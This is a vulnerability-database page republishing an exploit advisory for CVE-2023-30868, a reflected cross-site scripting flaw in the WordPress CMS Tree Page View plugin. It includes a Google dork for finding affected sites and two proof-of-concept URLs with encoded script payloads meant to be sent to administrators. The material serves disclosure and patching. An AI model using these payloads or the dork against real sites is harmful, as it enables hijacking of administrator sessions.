Vulners
Lucene search
Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Tree Page View Plugin 1.6.7 - Cross Site Scripting Vulnerability | 6 Jun 202300:00 | – | zdt |
 | WordPress plugin CMS Tree Page View 跨站脚本漏洞 | 18 May 202300:00 | – | cnnvd |
 | CVE-2023-30868 | 18 May 202308:28 | – | cve |
 | CVE-2023-30868 WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 18 May 202308:28 | – | cvelist |
 | Tree Page View Plugin < 1.6.7 - Cross-Site Scripting | 4 Jun 202603:48 | – | nuclei |
 | CVE-2023-30868 | 18 May 202309:15 | – | nvd |
 | WordPress CMS Tree Page View Plugin < 1.6.8 XSS Vulnerability | 12 Sep 202300:00 | – | openvas |
 | CVE-2023-30868 | 18 May 202309:15 | – | osv |
 | WordPress Tree Page View 1.6.7 Cross Site Scripting | 6 Jun 202300:00 | – | packetstorm |
 | WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 24 Apr 202300:00 | – | patchstack |
10
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
# 2. Proof of Concept (PoC):
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
1. CMS Tree Page View Plugin <= 1.6.6
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
b. your payload will be executed.
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
2. CMS Tree Page View Plugin <= 1.6.7
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1 - 7.1
EPSS0.54053
SSVC